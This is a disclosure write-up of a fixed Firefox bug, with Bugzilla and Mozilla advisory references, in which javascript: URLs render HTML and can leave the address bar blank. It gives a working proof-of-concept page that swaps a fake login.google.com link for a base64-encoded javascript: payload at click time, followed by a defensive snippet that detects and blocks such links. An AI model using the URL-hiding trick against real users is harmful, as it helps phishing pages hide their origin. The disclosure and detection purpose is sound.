FireFox Hide URL (FIXED)


The javascript: URL scheme in Firefox behaves differently from other browsers' implementations. For example, navigating to 'javascript:1' in Firefox causes the document to display the number '1'.

This behavior is not seen in other browsers. The way it works is that Firefox checks whether the expression returns a value; if it does, the returned text is displayed in the document. But what happens if we navigate to 'javascript:`<b>test</b>`'?
It returns that string, and we end up with a document whose HTML was rendered through a javascript: URL.
Since HTML gets rendered, we can also execute JavaScript inside a javascript: URL by navigating to something like 'javascript:`<script>alert(/this works!/)</script>`'.
Using the above, I stumbled upon a weird behavior where, when certain JavaScript is used, we can trick the browser into showing a completely blank address bar.

Original PoC code:


<html>
<head>
<title>FF-URL-hiding - @qab</title>
</head>
<body>
<a id='q' href='https://login.google.com/'>Click here</a>
<script>
var payload=btoa('<head><script>q=1;setTimeout($=>{location.reload()},12)<\/script></head>');
var payload2=('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');
var ql='javascript:try{q}catch(e){document.write(atob("'+payload2+'"))};`<script>if(location!=this.location){q=window}else{document.write(atob("'+payload+'"))}<\/script>`';
q.addEventListener("click",$=>{q.href=ql;});//We replace the href right before the user clicks it.
</script>
</body>
</html>
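
A defensive check for this class of link, as an added example that is not part of the original PoC: it flags anchors whose href is, or becomes, a javascript: URL, which is exactly what the PoC swaps in from its click listener. The function names are my own; the normalization follows how browsers strip leading controls and embedded tab/newline characters before reading the scheme.

```javascript
// Added example (not the original PoC): detect javascript: hrefs, including
// ones swapped in at click time, and block the navigation before it happens.

// Browsers strip leading C0 controls/spaces and drop ASCII tab/newline anywhere
// before parsing the scheme, so "  java\tscript:1" still runs as JavaScript.
function isJavascriptUrl(href) {
  if (typeof href !== 'string') return false;
  const cleaned = href
    .replace(/^[\u0000-\u0020]+/, '') // leading controls and spaces
    .replace(/[\t\n\r]/g, '');        // tab / newline / CR anywhere
  return /^javascript:/i.test(cleaned);
}

// One-time audit of the anchors currently in the document.
// Returns the flagged elements; note that it cannot see an href that a page
// script rewrites later (the PoC does that inside the anchor's click handler).
function auditAnchors(root) {
  const flagged = [];
  for (const a of root.querySelectorAll('a[href]')) {
    if (isJavascriptUrl(a.getAttribute('href'))) flagged.push(a);
  }
  return flagged;
}

// Bubble-phase click guard: it runs after the anchor's own click listeners,
// so it sees the href as it is at the moment the default navigation would
// start. Returns the handler so a caller can remove it later. Assumes the
// page script does not call stopPropagation() on the click event.
function installClickGuard(doc, onBlock) {
  const handler = event => {
    const a = event.target && event.target.closest && event.target.closest('a[href]');
    if (a && isJavascriptUrl(a.getAttribute('href'))) {
      event.preventDefault();   // stop the javascript: navigation
      onBlock(a);               // report it (log, telemetry, UI warning)
    }
  };
  doc.addEventListener('click', handler, false);
  return handler;
}
```

In a browser, `installClickGuard(document, a => console.warn('blocked', a))` is enough to stop the PoC's rewritten link from navigating.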


While testing this bug I found another bug in the javascript: URI scheme that resulted in a full URL spoof; the writeup can be found here

References:

The Bugzilla report: https://bugzilla.mozilla.org/show_bug.cgi?id=1228754
Mozilla Foundation Security Advisory 2016-21: https://www.mozilla.org/en-US/security/advisories/mfsa2016-21/